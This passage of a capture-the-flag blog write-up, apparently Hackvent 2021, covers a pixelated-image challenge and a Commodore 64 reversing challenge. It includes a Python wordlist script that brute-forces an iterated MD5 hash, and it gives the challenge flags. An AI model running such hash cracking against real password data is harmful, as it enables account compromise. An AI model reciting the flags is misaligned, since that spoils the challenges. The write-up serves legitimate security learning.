,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];\n    let move = -320;\n    let moving = 0;\n    function printPixels() {\n        if (moving++ % 2 === 0) move++;\n        if (move>300) move =-320;\n        for (let i = 0; i &lt; 40; i++) {\n            for (let j = 0; j &lt; 9; j++) {\n                let x = (i*8+move);\n                let y = ((j-2)*8+(i-15));\n                let color = x>0&amp;&amp;y>0&amp;&amp;x&lt;300&amp;&amp;y&lt;36?digits[x*36+y]:0;\n                context.fillStyle = \"#\"+(\"000000\"+((color &lt;&lt; 16) | (color &lt;&lt; 8) | color).toString(16)).slice(-6);\n                context.fillRect(i * 40, j * 40, 40, 40);\n            }\n        }\n        requestAnimationFrame(printPixels);\n    }\n    printPixels();<\/pre>\n\n\n\n<p>I examined the code and played around with it in JSFiddler. The array contains 10800 items, if we divide it by 36 we get 300 rows. -&gt; Thanks ludus!<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">let move = 0;\nlet moving = 0;\nconsole.log(digits.length)\nfunction printPixels() {\n  for (let x = 0; x &lt; 300; x++){\n    for (let y = 0; y &lt; 100; y++){\n      let color = digits[x*36+y];\n      \/\/console.log(color)\n      context.fillStyle = \"#\" + (\"0000\" + ((color &lt;&lt; 16) | (color &lt;&lt; 8) | color).toString(16)).slice(-6);\n      context.fillRect(x*5, y*5, 4000, 4000);\n    }\n  }\n  \/\/requestAnimationFrame(printPixels);\n}<\/pre>\n\n\n\n<p>If we alter the code as mentioned we get an image which is a bit more clear. Still far from readable though. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"230\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-1024x230.png\" alt=\"\" class=\"wp-image-1863\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-1024x230.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-300x68.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-768x173.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-1536x346.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred.png 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>On this we can apply a <a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/Motion_blur\" target=\"_blank\">motion blur filter<\/a> and make the image readable. I used an <a rel=\"noreferrer noopener\" href=\"https:\/\/play.google.com\/store\/apps\/details?id=mubeen.image.dehaze_enhancer&amp;hl=en&amp;gl=US\" target=\"_blank\">Android application<\/a> on my mobile phone to do so. I still had to guess some characters. The final result was this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"230\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-1024x230.png\" alt=\"\" class=\"wp-image-1864\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-1024x230.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-300x68.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-768x173.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-1536x346.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1.png 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{P1xeliz4t10n_N07_54v3}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.24] Dusty Disk Disaster<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-43-1.png\" alt=\"\" class=\"wp-image-1744\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>darkstar<\/em>. Merry reversing!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>It happened again: Santa misplaced some very important data. His elves came across an&nbsp;<a href=\"https:\/\/competition.hacking-lab.com\/api\/media\/challenge\/d64\/8e8f5260-8181-4187-9a24-a03d679d9d98.d64\" target=\"_blank\" rel=\"noreferrer noopener\">old dusty floppy disk<\/a>&nbsp;that they can unfortunately no longer read&#8230;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Could you please check if there is something important on it?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Wow, another amazing challenge from darkstar. We are provided with a d64 file, which is a Commodore 64 image. The hardest part of this challenge was to setup the environment to be able to analyze and solve this challenge. I used the <a rel=\"noreferrer noopener\" href=\"https:\/\/vice-emu.sourceforge.io\/\" target=\"_blank\">VICE emulator<\/a> and Ghidra to solve the challenge. In Ghidra I used an <a href=\"https:\/\/github.com\/zeroKilo\/C64LoaderWV\" target=\"_blank\" rel=\"noreferrer noopener\">additional plugin to work with d64 files<\/a>. <\/p>\n\n\n\n<p>Program Flow:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"936\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96-1024x936.png\" alt=\"\" class=\"wp-image-1869\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96-1024x936.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96-300x274.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96-768x702.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96.png 1442w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"937\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97-1024x937.png\" alt=\"\" class=\"wp-image-1870\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97-1024x937.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97-300x275.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97-768x703.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97.png 1442w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"936\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98-1024x936.png\" alt=\"\" class=\"wp-image-1871\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98-1024x936.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98-300x274.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98-768x702.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98.png 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>We need to revers engineer\/debug this application to get the right key to &#8220;free&#8221; the flag. After some time of scrolling through disassembled code in Ghidra I joined forces with ice and jokker. Once again we found constants in the disassembled code.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"740\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99-1024x740.png\" alt=\"\" class=\"wp-image-1872\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99-1024x740.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99-300x217.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99-768x555.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99.png 1232w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">A := 0123456716\nB: = 89ABCDEF16\nC := FEDCBA9816\nD := 7654321016<\/pre>\n\n\n\n<p>In the <a href=\"https:\/\/datatracker.ietf.org\/doc\/html\/rfc1321\" target=\"_blank\" rel=\"noreferrer noopener\">RFC of MD5 <\/a>we find this definition, which looks highly familiar!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"273\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100-1024x273.png\" alt=\"\" class=\"wp-image-1873\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100-1024x273.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100-300x80.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100-768x205.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100.png 1244w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Now we <\/figcaption><\/figure>\n\n\n\n<p>Now we know that MD5 hashing is used and the function FUN_2791 does implement it. I  started working with the debugger of VICE. First I set a break-point at the address 2791 which is the start of the MD5 function. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"96\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/breakpoint.png\" alt=\"\" class=\"wp-image-1874\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/breakpoint.png 830w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/breakpoint-300x35.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/breakpoint-768x89.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p>After setting the breakpoint I enter any key in the application and figure out that the MD5 function is called 11 times! I examine the memory of the application further and find the location of my input at cfa4:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"315\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-1024x315.png\" alt=\"\" class=\"wp-image-1875\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-1024x315.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-300x92.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-768x236.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-1536x472.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key.png 1684w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>My lower-case input &#8220;xxxxx&#8221; is transferred to upper case. First I thought the application just transforms every input to upper case. Through a hint I discovered, that Commodore stores it&#8217;s values in <a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/PETSCII\" target=\"_blank\">PETSCII <\/a>and not ASCII. This will become relevant when we brute force the key. <\/p>\n\n\n\n<p>Next I did find the location of the target hash and the hash of my input. These values are stored at cef4 and cf04:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"96\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash-1024x96.png\" alt=\"\" class=\"wp-image-1876\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash-1024x96.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash-300x28.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash-768x72.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash.png 1284w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Now we can verify if our input, hashed 11 times with MD5 matches with the data at cf04 of the memory.<strong> And indeed it does!<\/strong> Together with the hint which was released on the challenge page (ask a human about the password), we now know to use the <a rel=\"noreferrer noopener\" href=\"https:\/\/crackstation.net\/crackstation-wordlist-password-cracking-dictionary.htm\" target=\"_blank\">wordlist human-only<\/a> to bruteforce the right key. My final script to get the access key looks like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import hashlib\nimport cbmcodecs2\ntarget = \"b229f80b33fac1a464d6b1997ed66bd8\"\nf = open(\"human.txt\", \"r\", encoding='latin-1')\nl = 0\nfor line in f.readlines():\n    line = line.rstrip()\n    try:\n        h = hashlib.md5(line.encode('petscii_c64en_lc')).digest()\n    except:\n        continue\n    for i in range(10):\n    \th = hashlib.md5(h).digest()\n    \tif h.hex() == target:\n    \t\tprint(\"[+] Found match!\")\n    \t\tprint(\"[> \" + line)\n    \t\texit(0)\n    l += 1\n    if (l % 10000 == 0):\n    \tprint(l)<\/pre>\n\n\n\n<p>Running the Python script reveals the access key:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-101-1.png\" alt=\"\" class=\"wp-image-1877\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/key_accepted-1-1024x930.png\" alt=\"\" class=\"wp-image-1878\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag-1-2-1024x918.png\" alt=\"\" class=\"wp-image-1879\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{C64_r3v3rs1ng}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hackvent 2021 is over! Once again, this year&#8217;s Hackvent was terrific &#8211; even though it was uncertain until the start whether it would take place at all. Eventually, the event was a traditional, full-blown Hackvent! Thanks to all challenge contributors &hellip; <a href=\"https:\/\/sigterm.ch\/?p=1696\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,5],"tags":[8,20,21,22,29,30,37,38,39,43,47,66,68,69,77,81,86,97,119,122,127,128,132,133,144,163,165,167,168,169],"class_list":["post-1696","post","type-post","status-publish","format-standard","hentry","category-ctf","category-security","tag-0x90","tag-aslr","tag-asm","tag-assembly","tag-binary-exploit","tag-blockchain","tag-capture-the-flag","tag-crypto","tag-ctf","tag-development","tag-exploit","tag-hacking","tag-hacking-lab","tag-hackvent","tag-hackvent21","tag-hv","tag-hv21","tag-linux","tag-pie","tag-programming","tag-return-to-libc","tag-reverse-engineering","tag-rop","tag-ropper","tag-smart-contract","tag-waf","tag-web-application-security","tag-write-up","tag-write-up-2","tag-writeup"],"_links":{"self":[{"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/posts\/1696","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sigterm.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1696"}],"version-history":[{"count":4,"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/posts\/1696\/revisions"}],"predecessor-version":[{"id":2173,"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/posts\/1696\/revisions\/2173"}],"wp:attachment":[{"href":"https:\/\/sigterm.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1696"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sigterm.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1696"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sigterm.ch\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1696"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}